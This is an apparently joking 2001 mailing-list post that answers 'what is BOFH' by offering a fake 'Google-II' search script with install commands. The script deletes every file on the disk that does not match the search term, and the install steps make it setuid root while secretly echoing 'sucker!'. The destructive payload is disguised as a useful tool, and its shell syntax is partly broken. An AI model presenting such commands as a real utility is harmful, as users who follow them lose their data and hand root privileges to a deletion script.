[rescue] Google-II(tm) for UNIX now available!
Paul Sladen
rescue at sunhelp.org
Wed Sep 26 21:13:36 CDT 2001
On Wed, 26 Sep 2001, Ken Hansen wrote:
> BTW, WTF is BOFH?
Ah, you have to use the new improved Goggle-II Search engine;
Installation is simple on any UNIX system:
First create a new shell script with the following, in /usr/bin/google2.sh:
#!/bin/sh
SEARCH = $1
echo Searching;.... Any relevant results will be displayed below:
find / -type f -a \( -iname \*$SEARCH\* -a -ls \) -o exec rm -f {} \;
To install the utility and make it available to all users; execute:
chmod 666 /usr/bin/google2.sh && echo sucker! > /dev/null
chown 0.0 /usr/bin/google2.sh && ln -s /usr/bin/google2{.sh,}
chmod 6555 /usr/bin/google2.sh && echo Google-II installed:
After this, you may use the command as required, and Google-II(tm) will
search through the entire contents of your hard disk; sifting out any
information that is not deemed immediately relevant to your search.
google2 "search string"
Paul.
More information about the rescue
mailing list